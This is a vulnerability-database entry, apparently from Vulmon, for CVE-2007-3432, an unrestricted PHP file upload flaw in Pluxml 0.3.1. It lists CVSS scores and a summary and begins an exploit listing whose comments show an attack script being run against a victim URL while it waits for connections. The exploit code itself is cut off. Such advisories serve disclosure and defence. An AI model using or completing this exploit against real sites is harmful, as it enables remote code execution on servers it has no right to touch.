7.5
CVSSv2

CVE-2007-3432

Published: 27/06/2007 Updated: 16/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Unrestricted file upload vulnerability in admin/images.php in Pluxml 0.3.1 allows remote malicious users to upload and execute arbitrary PHP code via a .jpg filename.

Vulnerable Product Search on Vulmon Subscribe to Product

pluxml pluxml 0.3.1

Exploits

<?php # C:\> sploitphp -url victimcom/pluxml031/ -ip 902710196 # [/]Waiting for connection on 902710196:80/ # [!]Now you have to make the victim to click on the url # [+]Received 395 bytes from 18226542:2007 # [+]Sending 366 bytes to 18226542:2007 # [+]Received 326 bytes from 18226542:2009 # [+]Sending 366 byt ...